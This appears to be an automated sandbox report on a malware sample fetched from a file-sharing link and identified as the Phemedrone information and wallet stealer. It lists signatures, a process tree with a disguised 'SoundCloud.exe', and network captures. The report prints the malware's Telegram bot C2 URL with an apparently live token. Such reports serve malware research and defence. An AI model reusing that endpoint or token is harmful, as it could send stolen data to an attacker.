Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    99s
  • max time network
    191s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    16/05/2024, 06:56 UTC

General

  • Target

    https://workupload.com/file/fkp8vSaWfcU

Malware Config

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendMessage?chat_id=-4194654645

Signatures

  • Phemedrone

    An information and wallet stealer written in C#.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 22 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 46 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://workupload.com/file/fkp8vSaWfcU
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff9f90ab58,0x7fff9f90ab68,0x7fff9f90ab78
      2⤵
        PID:4988
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:2
        2⤵
          PID:4944
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
          2⤵
            PID:3552
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2156 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
            2⤵
              PID:4856
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
              2⤵
                PID:1656
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3016 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
                2⤵
                  PID:752
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4300 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                  2⤵
                    PID:2636
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4596 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                    2⤵
                      PID:3636
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                      2⤵
                      • NTFS ADS
                      PID:980
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4908 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
                      2⤵
                        PID:3652
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4328 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
                        2⤵
                          PID:4932
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3256 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                          2⤵
                            PID:1032
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3200 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                            2⤵
                              PID:2988
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3184 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                              2⤵
                              • NTFS ADS
                              PID:5000
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3216 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                              2⤵
                                PID:736
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3228 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                2⤵
                                  PID:860
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3244 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                  2⤵
                                    PID:4968
                                  • C:\Users\Admin\Downloads\7z2405-x64.exe
                                    "C:\Users\Admin\Downloads\7z2405-x64.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Registers COM server for autorun
                                    • Drops file in Program Files directory
                                    • Modifies registry class
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2920
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3212 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                    2⤵
                                      PID:776
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                      2⤵
                                        PID:1636
                                    • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                      1⤵
                                        PID:3984
                                      • C:\Windows\system32\OpenWith.exe
                                        C:\Windows\system32\OpenWith.exe -Embedding
                                        1⤵
                                        • Modifies registry class
                                        • Suspicious use of SetWindowsHookEx
                                        PID:648
                                      • C:\Windows\System32\rundll32.exe
                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                        1⤵
                                          PID:1284
                                        • C:\Program Files\7-Zip\7zFM.exe
                                          "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\alright prynce v2 fr.rar"
                                          1⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious behavior: GetForegroundWindowSpam
                                          • Suspicious use of FindShellTrayWindow
                                          PID:3188
                                        • C:\Users\Admin\Desktop\SoundCloud.exe
                                          "C:\Users\Admin\Desktop\SoundCloud.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:1848
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            2⤵
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4876
                                        • C:\Users\Admin\Desktop\SoundCloud.exe
                                          "C:\Users\Admin\Desktop\SoundCloud.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3168
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            2⤵
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4820
                                        • C:\Users\Admin\Desktop\SoundCloud.exe
                                          "C:\Users\Admin\Desktop\SoundCloud.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4384
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            2⤵
                                            • Checks processor information in registry
                                            PID:868
                                        • C:\Windows\system32\wbem\WmiApSrv.exe
                                          C:\Windows\system32\wbem\WmiApSrv.exe
                                          1⤵
                                            PID:2924

                                          Network

                                          • flag-us
                                            DNS
                                            workupload.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            workupload.com
                                            IN A
                                            Response
                                            workupload.com
                                            IN A
                                            144.76.176.119
                                          • flag-us
                                            DNS
                                            googleads.g.doubleclick.net
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            googleads.g.doubleclick.net
                                            IN A
                                            Response
                                            googleads.g.doubleclick.net
                                            IN A
                                            172.217.20.162
                                          • flag-us
                                            DNS
                                            t.workupload.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            t.workupload.com
                                            IN A
                                            Response
                                            t.workupload.com
                                            IN A
                                            49.13.126.162
                                          • flag-us
                                            DNS
                                            162.20.217.172.in-addr.arpa
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            Response
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f1621e100net
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            par10s49-in-f2�J
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f2�J
                                          • flag-us
                                            DNS
                                            fonts.gstatic.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            fonts.gstatic.com
                                            IN A
                                            Response
                                            fonts.gstatic.com
                                            IN A
                                            216.58.214.67
                                          • flag-us
                                            DNS
                                            apis.google.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            apis.google.com
                                            IN A
                                            Response
                                            apis.google.com
                                            IN CNAME
                                            plus.l.google.com
                                            plus.l.google.com
                                            IN A
                                            142.250.178.142
                                          • flag-us
                                            DNS
                                            237.202.12.49.in-addr.arpa
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            237.202.12.49.in-addr.arpa
                                            IN PTR
                                            Response
                                            237.202.12.49.in-addr.arpa
                                            IN PTR
                                            static2372021249clients your-serverde
                                          • flag-us
                                            DNS
                                            ip-api.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            ip-api.com
                                            IN A
                                            Response
                                            ip-api.com
                                            IN A
                                            208.95.112.1
                                          • flag-de
                                            GET
                                            https://workupload.com/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:04 GMT
                                            Server: Apache
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 1572
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/js/39b9ad5.js?v=KUUBLAOP
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /js/39b9ad5.js?v=KUUBLAOP HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:04 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "59171-60e5f59ac742c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: application/javascript
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLAOP
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "c3a4-60e5f59ac648c"
                                            Accept-Ranges: bytes
                                            Content-Length: 50084
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/css/4280ebd.css?v=KUUBLAOP
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /css/4280ebd.css?v=KUUBLAOP HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: text/css,*/*;q=0.1
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: style
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:04 GMT
                                            Server: Apache
                                            Last-Modified: Fri, 23 Feb 2024 14:17:19 GMT
                                            ETag: "34295-6120d37c4bb6c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 35970
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/css
                                          • flag-de
                                            GET
                                            https://workupload.com/bundles/app/img/workupload_logo_medium.svg
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /bundles/app/img/workupload_logo_medium.svg HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "1936-60e5f59ac454c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 2965
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: image/svg+xml
                                          • flag-de
                                            GET
                                            https://workupload.com/puzzle
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /puzzle HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Accept: application/json, text/javascript, */*; q=0.01
                                            X-Requested-With: XMLHttpRequest
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Set-Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D; expires=Sat, 15-Jun-2024 06:57:05 GMT; Max-Age=2592000; path=/; domain=.workupload.com
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 221
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://t.workupload.com/matomo.js
                                            chrome.exe
                                            Remote address:
                                            49.13.126.162:443
                                            Request
                                            GET /matomo.js HTTP/1.1
                                            Host: t.workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache/2.4.57 (Debian)
                                            Last-Modified: Thu, 07 Mar 2024 23:35:49 GMT
                                            ETag: "1042f-6131a8902bf40-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 21709
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/javascript
                                          • flag-de
                                            POST
                                            https://t.workupload.com/matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720
                                            chrome.exe
                                            Remote address:
                                            49.13.126.162:443
                                            Request
                                            POST /matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/1.1
                                            Host: t.workupload.com
                                            Connection: keep-alive
                                            Content-Length: 0
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-platform: "Windows"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                            Accept: */*
                                            Origin: https://workupload.com
                                            Sec-Fetch-Site: same-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D
                                            Response
                                            HTTP/1.1 204 No Response
                                            Date: Thu, 16 May 2024 06:57:05 GMT
